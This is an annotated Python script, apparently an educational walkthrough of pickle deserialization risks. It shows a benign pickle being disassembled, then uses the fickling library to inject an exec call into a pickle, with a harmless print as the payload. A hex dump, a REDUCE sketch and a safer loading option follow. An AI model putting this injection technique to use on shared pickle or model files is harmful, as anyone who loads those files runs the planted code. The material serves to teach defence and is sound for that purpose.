import pickle
import pickletools
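# Example 1: pickle a plain string, then look at the opcodes that were written.
var = "data I want to share with a friend"

# store the pickle data in a file named 'payload.pkl'
with open('payload.pkl', 'wb') as f:
    pickle.dump(var, f)

# disassemble the pickle
# and print the instructions to the command line
# pickletools.dis() only decodes the opcode stream; it does not run it, so it
# is the appropriate way to look inside a pickle of unknown origin.
with open('payload.pkl', 'rb') as f:
    pickletools.dis(f)

# Output printed by the call above (captured from the original page):
#     0: \x80 PROTO      4
#     2: \x95 FRAME      48
#    11: \x8c SHORT_BINUNICODE 'data I want to share with a friend'
#    57: \x94 MEMOIZE    (as 0)
#    58: .    STOP
# highest protocol among opcodes = 4
#
# A benign string pickle contains only data opcodes: no GLOBAL/STACK_GLOBAL
# import and no REDUCE call.

# The next example's imports start here.
import pickle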
import pickletools
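class Data:
    """Minimal user-defined class used to show how instances are pickled.

    Args:
        important_stuff: Arbitrary string stored on the instance.
    """

    def __init__(self, important_stuff: str):
        self.important_stuff = important_stuff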
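# Example 2: pickle an instance of a user-defined class.
# pickle does not store the class body. It records the class by module and
# qualified name plus the instance state, and the loader imports that name and
# calls it to rebuild the object. That import-and-call step is what makes
# loading a pickle from an untrusted source equivalent to running its code.
d = Data("42")

with open('payload.pkl', 'wb') as f:
    pickle.dump(d, f)

# The next example's imports start here.
from fickling.pickle import Pickled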
import pickle
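# Example 3: demonstration of why pickle.load() must not be used on files
# from an untrusted source. The payload here only prints a marker string.

# Create a malicious pickle
data = "my friend needs to know this"
pickle_bin = pickle.dumps(data)
p = Pickled.load(pickle_bin)
p.insert_python_exec('print("you\'ve been pwned !")')
with open('payload.pkl', 'wb') as f:
    p.dump(f)

# innocently unpickle and get your friend's data
# SECURITY: pickle.load() runs the injected call while it decodes the stream
# and still returns the expected value, so the caller gets no error or other
# signal that anything ran. Inspect unknown pickles statically with
# pickletools.dis() instead of loading them, and prefer a data-only format
# for anything that is exchanged between parties.
with open('payload.pkl', 'rb') as f:
    data = pickle.load(f)
    print(data)

# Output of the script (captured from the original page):
#   you've been pwned !
#   my friend needs to know this
#
# # cat payload.pkl
#   c__builtin__
#   exec
#   (Vprint("you've been pwned !")
#   tR my friend needs to know this.%
#
# What to look for when reviewing such a file: the stream opens with a GLOBAL
# opcode ('c') naming __builtin__ exec, followed by an argument tuple ('t')
# and REDUCE ('R'), ahead of the original string payload. A pickle that holds
# only data has no reason to import and call a builtin like exec.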
# hexyl payload.pkl
┌────────┬─────────────────────────┬─────────────────────────┬────────┬────────┐
│00000000│ 63 5f 5f 62 75 69 6c 74 ┊ 69 6e 5f 5f 0a 65 78 65 │c__built┊in___exe│
│00000010│ 63 0a 28 56 70 72 69 6e ┊ 74 28 22 79 6f 75 27 76 │c_(Vprin┊t("you'v│
│00000020│ 65 20 62 65 65 6e 20 70 ┊ 77 6e 65 64 20 21 22 29 │e been p┊wned !")│
│00000030│ 0a 74 52 80 04 95 20 00 ┊ 00 00 00 00 00 00 8c 1c │_tR×•× 0┊000000×•│
│00000040│ 6d 79 20 66 72 69 65 6e ┊ 64 20 6e 65 65 64 73 20 │my frien┊d needs │
│00000050│ 74 6f 20 6b 6e 6f 77 20 ┊ 74 68 69 73 94 2e       │to know ┊this×.  │
└────────┴─────────────────────────┴─────────────────────────┴────────┴────────┘
# ...
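# Simplified sketch of how the unpickler handles REDUCE (illustrative only:
# exec_func stands for whatever callable the stream imported earlier).
opcodes_stack = [exec_func, "malicious argument", "REDUCE"]
# Pop from the same stack that was just built; the original popped from an
# undefined name `stack`.
opcode = opcodes_stack.pop()
if opcode == "REDUCE":
    arg = opcodes_stack.pop()
    # Named `func` rather than `callable` to avoid shadowing the builtin.
    func = opcodes_stack.pop()
    # REDUCE calls whatever callable the stream supplied with the arguments
    # the stream supplied; the loader places no restriction on either, which
    # is why scanners treat GLOBAL + REDUCE pairs as the thing to review.
    opcodes_stack.append(func(arg))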
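# ...
# The import below was fused onto the "# ..." comment line, which left
# AutoModel undefined; it is restored as its own statement.
from transformers import AutoModel

# Mitigation example: from_flax=True asks for the Flax checkpoint of the model
# instead of the pickle-based PyTorch weights file, so no pickle stream is
# deserialized when the weights are loaded.
model = AutoModel.from_pretrained("bert-base-cased", from_flax=True)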